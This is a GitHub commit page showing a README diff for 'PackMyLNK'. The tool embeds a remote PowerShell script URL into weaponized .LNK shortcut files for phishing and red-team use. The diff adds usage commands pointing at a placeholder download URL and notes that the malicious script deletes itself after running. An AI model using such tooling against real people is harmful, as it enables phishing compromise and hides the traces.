Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
CalfCrusher authored Nov 16, 2024
1 parent 101deca commit 1ebea63
Showing 1 changed file with 5 additions and 2 deletions.
7 changes: 5 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,10 +4,13 @@ This tool takes a URL pointing to a PowerShell script and embeds it into a weapo

Surprisingly, .LNK files remain effective today as an initial compromise vector in phishing and Red Team engagements!


## Usage
`.\PackMyLNK.exe -Url http://example.com/RunMe.ps1`

![Screenshot 2024-11-03 102536](https://github.com/user-attachments/assets/c13de60e-20c6-480a-b8c9-77f5f18303c6)
`.\PackMyLNK.exe -Url http://example.com/runme.ps1 -Lnk Manual -Zip Project`

![Screenshot 2024-11-16 140031](https://github.com/user-attachments/assets/8bed007c-093e-4c7b-b63e-ef67fbc00501)

> [NOTE] The malicious script delete itself after the execution !
#### DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage.

0 comments on commit 1ebea63

Please sign in to comment.